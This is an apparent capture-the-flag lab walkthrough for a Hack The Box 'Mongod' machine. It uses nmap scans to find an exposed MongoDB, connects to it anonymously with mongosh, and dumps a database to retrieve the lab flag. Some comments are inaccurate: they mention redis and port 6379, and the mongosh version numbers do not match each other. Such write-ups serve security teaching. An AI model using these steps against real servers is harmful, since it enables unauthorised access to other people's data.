07.MONGOD (MONGODB)
MongoDB, Databases, Reconnaissance, Misconfiguration, Anonymous/Guest Access
Last updated
MongoDB, Databases, Reconnaissance, Misconfiguration, Anonymous/Guest Access
Last updated
root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpnroot@htb:~$ nmap -sV -T4 {targetIP} -p-
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
27017/tcp open mongodb MongoDB 3.6.8root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 27017
PORT STATE SERVICE VERSION
27017/tcp open mongodb MongoDB 3.6.8 3.6.8
| mongodb-info:
| MongoDB Build info
| openssl
| running = OpenSSL 1.1.1f 31 Mar 2020
| compiled = OpenSSL 1.1.1f 31 Mar 2020
| ok = 1.0
| buildEnvironment
| target_arch = x86_64
| distmod =
| target_os = linux
...
* the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
scripts for service enumeration, version detection, and other basic checks.
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 27017
PORT STATE SERVICE
27017/tcp open mongod
* the --script=vuln will run scripts that focus specifically on detecting known
vulnerabilities in the service running on port 6379
- e.g., weak configurations, or known vulnerabilities in the redis service
- if no results are found then the service may be fully patched!root@htb:~$ which mongosh
root@htb:~$ sudo apt search mongosh
mongodb-mongosh/bullseye/mongodb-org/7.0 2.3.7 amd64 [upgradable from: 1.10.6] MongoDB Shell CLI REPL Package
root@htb:~$ sudo apt install mongodb-mongosh
* ALT: wget https://github.com/mongodb-js/mongosh/releases/download/v2.0.0/mongosh-2.0.0-linux-x64.tgz
tar xvf mongosh-2.3.2-linux-x64.tgz
cd mongosh-2.3.2-linux-x64/bin
./mongosh mongodb://{target_IP}:27017
- use the older version of mongosh due to client/server version incompatibility
#connecting to the MongoDB server running on the remote host as an anonymous user.
root@htb:~$ which mongosh
/usr/bin/mongosh
* mongosh is a MongoDB Shell utility used connect to the remote MongoDB server
root@htb:~$ mongosh mongodb://10.129.255.118:27017
* this cmd will automatically connect to the remote MongoDB server using anonymous credentials (if allowed)
#enumeration
mongoDB> show dbs; //list databases
admin 32.00 KiB
config 72.00 KiB
local 72.00 KiB
sensitive_information 32.00 KiB
users 32.00 KiB
mongoDB$ use sensitive_information; //access a database
switched to db sensitive_information
mongoDB\sensitive_information> show collections; //list collections stored in the database named sensitive_information
flag
mongoDB\sensitive_information> db.flag.find();
[
{
_id: ObjectId("630e3dbcb82540ebbd1748c5"),
flag: '1b6e6fb359e7c40241b6d431427ba6ea'
}
]
* the db.{collectionName}.find() cmd will dump the contents of the document
* ALT: mongoDB$ db.flag.find().pretty(); //dump contents of the documents present in the flag collection
[
{
_id: ObjectId("630e3dbcb82540ebbd1748c5"),
flag: '1b6e6fb359e7c40241b6d431427ba6ea'
}
]